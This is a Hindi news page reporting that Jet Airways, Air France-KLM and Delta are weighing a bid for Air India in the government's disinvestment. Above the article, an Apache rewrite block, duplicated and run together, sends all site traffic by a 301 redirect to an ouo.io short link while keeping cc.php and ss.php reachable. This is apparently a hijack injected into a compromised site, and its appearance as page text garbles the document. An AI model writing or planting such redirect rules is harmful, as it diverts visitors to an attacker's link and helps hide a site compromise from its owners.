
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 310
Previous Nextनई दिल्ली। जेट एयरवेज, एयर फ्रांस-केएलएम और डेल्टा एयरलाइंस के एक समूह ने एयर इंडिया के डिसइनवेस्टमेंट प्रोग्राम में दिलचस्पी दिखाई है। सरकार लॉस में चल रही सरकारी एयरलाइन कंपनी में स्ट्रैटेजिक डिसइनवेस्टमेंट प्लान पर काम रही है और वह बिडर्स से एक्सप्रेशन ऑफ इंटरेस्ट जल्द मंगा सकती है। सूत्रों ने बताया कि इसको देखते हुए जेट एयरवेज सहित तीनों फुल सर्विस कंपनियों का समूह एयर इंडिया के लिए बोली लगाने के बारे में सोच रहा है। इस बारे में संपर्क किए जाने पर जेट एयरवेज के स्पोक्सपर्सन ने कहा कि एयरलाइन कयासों पर कमेंट नहीं करती।
नरेश गोयल की एयरलाइन कंपनी जेट एयरवेज ने चार महीने पहले एयर फ्रांस-केएलएम ग्रुप के साथ सहयोग के करार को बढ़ाया था। यहां दिलचस्प बात यह है कि जेट एयरवेज को पिछले साल ज्वाइन करने वाले सीईओ विजय दुबे के पास डेल्टा एयरलाइंस में एक दशक से ज्यादा समय तक काम करने का अनुभव है। दुबे जेट एयरवेज में आने से पहले अमेरिकी एयरलाइन कंपनी में सीनियर वाइस प्रेसिडेंट (एशिया पैसेफिक) थे। एयर फ्रांस-केएलएम और उसकी पार्टनर डेल्टा और एलइटालिया मिलकर रोजाना 270 से ज्यादा डेली फ्लाइट्स वाली देश की सबसे बड़ी ट्रांस-अटलांटिक ज्वाइंट वेंचर चला रही हैं।
जानकारी के अनुसार सरकार इसी साल एयर इंडिया के निजीकरण का काम पूरा कर सकती है और अपनी चार अलग-अलग एंटिटीज को बेच सकती है। पिछले साल मिनिस्टर ऑफ स्टेट फॉर सिविल एविएशन जयंत सिन्हा ने कहा था कि उन्होंने एयर इंडिया के लिए कई कंपनियों और एयर इंडिया ग्रुप की अलग अलग एंटिटीज से बात कर चुके हैं। एयर इंडिया, इसकी लो कॉस्ट कंपनी एयर इंडिया एक्सप्रेस और सब्सिडियरी AISATS को एक एंटिटी के और पर ऑफर किया जा सकता है जबकि रीजनल यूनिट एलायंस एयर अलग कंपनी होगी। इसके अलावा एयर इंडिया एयर ट्रांसपोर्ट सर्विसेज लिमिटेड और एयर इंडिया इंजीनियरिंग सर्विसेज लिमिटेड (AIESL) को अलग अलग बेचा जाएगा।